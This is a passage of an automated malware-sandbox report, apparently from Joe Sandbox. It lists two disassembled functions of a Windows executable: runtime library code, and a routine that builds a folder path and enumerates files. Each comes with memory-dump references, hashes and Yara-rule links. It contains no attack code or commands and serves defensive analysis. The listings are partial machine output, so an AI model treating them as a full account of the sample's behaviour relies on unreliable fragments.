                              • Instruction ID: 3bf44bd0f112e297bbf3f7db0b05bc07434180030ad7f62ab24677ce23c8b951
                              • Opcode Fuzzy Hash: ae1bb899389c2c1ba8528cbf6dbf0585b51dff921dab19de5dd5a5b4b783e74c
                              • Instruction Fuzzy Hash: D1F037B9E44208BBDB14DBF0DC49B9E77B9BB48720F11C254FA51B72C0DAB0AA018F45
                              Function 0013C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 0013C74E
                                • Part of subcall function 0013BF9F: __amsg_exit.LIBCMT ref: 0013BFAF
                              • __getptd.LIBCMT ref: 0013C765
                              • __amsg_exit.LIBCMT ref: 0013C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0013C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 4c566a9830292a99c318934aeebd1157e3549e6ae0b12fa81be639d157bfc550
                              • Instruction ID: 5de4c3afd4347153f745e81d9ca160f708ee7f81389da08f4b0ff1ec23867815
                              • Opcode Fuzzy Hash: 4c566a9830292a99c318934aeebd1157e3549e6ae0b12fa81be639d157bfc550
                              • Instruction Fuzzy Hash: 9FF0B4329083009BE721BBB8588775E37A06F10720F214149F904B72E2DB6459419FD6
                              Function 00134F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00134F7A
                              • lstrcat.KERNEL32(?,00141070), ref: 00134F97
                              • lstrcat.KERNEL32(?,00FF9098), ref: 00134FAB
                              • lstrcat.KERNEL32(?,00141074), ref: 00134FBD
                                • Part of subcall function 00134910: wsprintfA.USER32 ref: 0013492C
                                • Part of subcall function 00134910: FindFirstFileA.KERNEL32(?,?), ref: 00134943
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                                • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                                • Part of subcall function 00134910: FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                                • Part of subcall function 00134910: FindClose.KERNEL32(000000FF), ref: 00134B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: a60c91ba3aa04d565cfcf5278e8eafd8f0208f7b16be32ecf58302250f671298
                              • Instruction ID: 6fe309fc72df74a1268157b22e813a63da9d0445af8a9607dbc9e3595d2a7f2f
                              • Opcode Fuzzy Hash: a60c91ba3aa04d565cfcf5278e8eafd8f0208f7b16be32ecf58302250f671298
                              • Instruction Fuzzy Hash: 81219B7690021467C755F7B0EC46EED377CAB65300F008598F69AA3191EFB596C88F92